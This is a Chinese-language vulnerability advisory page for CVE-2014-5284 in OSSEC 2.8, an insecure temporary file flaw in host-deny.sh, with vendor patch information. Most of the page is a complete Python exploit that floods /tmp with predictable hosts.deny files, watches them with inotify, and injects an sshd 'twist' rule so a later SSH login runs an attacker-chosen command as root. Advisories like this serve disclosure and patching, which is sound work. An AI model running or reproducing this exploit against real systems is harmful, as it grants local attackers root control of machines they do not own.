OSSEC不安全临时文件创建漏洞(CVE-2014-5284)
BugTraq-ID:70149
CVE-ID:CVE-2014-5284
发布日期：2014-09-09
更新日期：2014-12-11
受影响系统：
OSSEC OSSEC 2.8
详细信息：

OSSEC是开源的基于主机的入侵检测系统。

 

OSSEC 2.8.1之前版本中，host-deny.sh用可预测的文件名写入到临时文件，而不验证所有权，这可使本地用户修改hosts.deny的访问限制，在执行自动IP封锁之前创建临时文件而获取root权限。

来源：
Jeff Petersen
测试方法：
警 告以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！#!/usr/bin/python

# Exploit Title: ossec 2.8 Insecure Temporary File Creation Vulnerability Privilege Escalation

# Date: 14-11-14

# Exploit Author: skynet-13

# Vendor Homepage: www.ossec.net/

# Software Link: https://github.com/ossec/ossec-hids/archive/2.8.1.tar.gz

# Version: OSSEC - 2.8

# Tested on: Ubunutu x86_64

# CVE : 2014-5284

 

# Created from Research by

# Jeff Petersen

# Roka Security LLC

# jpetersen@rokasecurity.com

# Original info at https://github.com/ossec/ossec-hids/releases/tag/2.8.1

 

# Run this on target machine and follow instructions to execute command as root

 

from twisted.internet import inotify

from twisted.python import filepath

from twisted.internet import reactor

import os

import optparse

import signal

 

 

class HostDenyExploiter(object):

 

def __init__(self, path_to_watch, cmd):

self.path = path_to_watch

self.notifier = inotify.INotify()

self.exploit = cmd

 

def create_files(self):

print "=============================================="

print "Creating /tmp/hosts.deny.300 through /tmp/hosts.deny.65536 ..."

 

for i in range(300, 65536):

filename = "/tmp/hosts.deny.%s" % i

f = open(filename, \'w\')

f.write("")

f.close()

 

def watch_files(self):

print "=============================================="

print "Monitoring tmp for file change...."

print "ssh into the system a few times with an incorrect password"

print "Then wait for up to 10 mins"

print "=============================================="

self.notifier.startReading()

self.notifier.watch(filepath.FilePath(self.path), callbacks=[self.on_file_change])

 

def write_exploit_to_file(self, path):

print \'Writing exploit to this file\'

f = open(str(path).split("\'")[1], \'w\')

f.write(\' sshd : ALL : twist %s \\n\' % self.exploit)

f.close()

print "=============================================="

print " ssh in again to execute the command"

print "=============================================="

print " End Prog."

os.kill(os.getpid(), signal.SIGUSR1)

 

def on_file_change(self, watch, path, mask):

print \'File: \', str(path).split("\'")[1], \' has just been modified\'

self.notifier.stopReading()

self.write_exploit_to_file(path)

 

 

if __name__ == \'__main__\':

parser = optparse.OptionParser("usage of program \\n" + "-c Command to run as root in quotes\\n")

parser.add_option(\'-c\', dest=\'cmd\', type=\'string\', help=\'Used to specify a command to run as root\')

(options, args) = parser.parse_args()

cmd = options.cmd

if options.cmd is None:

print parser.usage

exit(0)

ex = HostDenyExploiter(\'/tmp\', cmd)

ex.create_files()

ex.watch_files()

reactor.run()

exit(0)
解决办法：
厂商补丁：

OSSEC
-----
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

 

http://www.ossec.net/